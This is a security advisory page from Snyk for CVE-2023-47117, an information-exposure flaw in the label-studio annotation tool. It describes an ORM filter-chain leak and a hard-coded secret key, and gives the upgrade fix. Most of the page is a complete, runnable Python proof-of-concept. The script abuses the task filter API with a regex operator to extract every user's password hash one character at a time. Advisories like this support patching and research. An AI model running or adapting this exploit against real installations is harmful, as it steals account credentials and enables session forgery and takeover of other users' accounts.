Exposure of Sensitive Information to an Unauthorized Actor Affecting label-studio package, versions [,1.9.2.post0)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
9.83% (95th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-LABELSTUDIO-6056277
  • published14 Nov 2023
  • disclosed13 Nov 2023
  • creditalex-elttam

Introduced: 13 Nov 2023

CVE-2023-47117  (opens in a new tab)
CWE-200  (opens in a new tab)

How to fix?

Upgrade label-studio to version 1.9.2.post0 or higher.

Overview

label-studio is a Label Studio annotation tool

Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor through the application's ability to set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). As the results of the query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. Furthermore, the application had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes.

PoC


import argparse
import re
import requests
import string
import sys

# Password hash characters
CHARS = string.ascii_letters + string.digits + '$/+=_!'
CHARS_LEN = len(CHARS)

PAYLOAD = {
    "data": {
        "columnsDisplayType": {},
        "columnsWidth": {},
        "filters": {
            "conjunction": "and",
            "items": [
                {
                    "filter": "filter:tasks:updated_by__active_organization__active_users__password", # ORM Leak filter chain
                    "operator": "regex", # Use regex operator to filter password hash value
                    "type": "String",
                    "value": "REPLACEME"
                }
            ]
        },
        "gridWidth": 4,
        "hiddenColumns":{"explore":["tasks:inner_id"],"labeling":["tasks:id","tasks:inner_id"]},
        "ordering": [],
        "search_text": None,
        "target": "tasks",
        "title": "Default",
        "type": "list"
    },
    "id": 1, # View ID
    "project": "1" # Project ID
}

def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description='Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio'
    )

    parser.add_argument(
        '-v', '--view-id',
        help='View id of the page',
        type=int,
        required=True
    )

    parser.add_argument(
        '-p', '--project-id',
        help='Project id to filter tasks for',
        type=int,
        required=True
    )

    parser.add_argument(
        '-c', '--cookie-str',
        help='Cookie string for authentication',
        required=True
    )

    parser.add_argument(
        '-u', '--url',
        help='Base URL to Label Studio instance',
        required=True
    )

    return parser.parse_args()

def setup() -> dict:
    args = parse_args()
    view_id = args.view_id
    project_id = args.project_id
    path_1 = "/api/dm/views/{view_id}?interaction=filter&project={project_id}".format(
        view_id=view_id,
        project_id=project_id
    )
    path_2 = "/api/tasks?page=1&page_size=1&view={view_id}&interaction=filter&project={project_id}".format(
        view_id=view_id,
        project_id=project_id
    )
    PAYLOAD["id"] = view_id
    PAYLOAD["project"] = str(project_id)
    
    config_dict = {
        'COOKIE_STR': args.cookie_str,
        'URL_PATH_1': args.url + path_1,
        'URL_PATH_2': args.url + path_2,
        'PAYLOAD': PAYLOAD
    }
    return config_dict

def test_payload(config_dict: dict, payload) -> bool:
    sys.stdout.flush()
    cookie_str = config_dict["COOKIE_STR"]
    r_set = requests.patch(
        config_dict["URL_PATH_1"],
        json=payload,
        headers={
            "Cookie": cookie_str
        }
    )

    r_listen = requests.get(
        config_dict['URL_PATH_2'],
        headers={
            "Cookie": cookie_str
        }
    )

    r_json = r_listen.json()
    return len(r_json["tasks"]) >= 1

def test_char(config_dict, known_hash, c):
    json_payload_suffix = PAYLOAD
    test_escaped = re.escape(known_hash + c)
    json_payload_suffix["data"]["filters"]["items"][0]["value"] =  f"^{test_escaped}"

    suffix_result = test_payload(config_dict, json_payload_suffix)
    if suffix_result:
        return (known_hash + c, c)
    
    return None

def main():
    config_dict = setup()
    # By default Label Studio password hashes start with these characters
    known_hash = "pbkdf2_sha256$260000$"
    print()
    print(f"dumped: {known_hash}", end="")
    sys.stdout.flush()

    while True:
        found = False

        for c in CHARS:
            r = test_char(config_dict, known_hash, c)
            if not r is None:
                new_hash, c = r
                known_hash = new_hash
                print(c, end="")
                sys.stdout.flush()
                found = True
                break

        if not found:
            break

    print()

if __name__ == "__main__":
    main()

CVSS Scores

version 3.1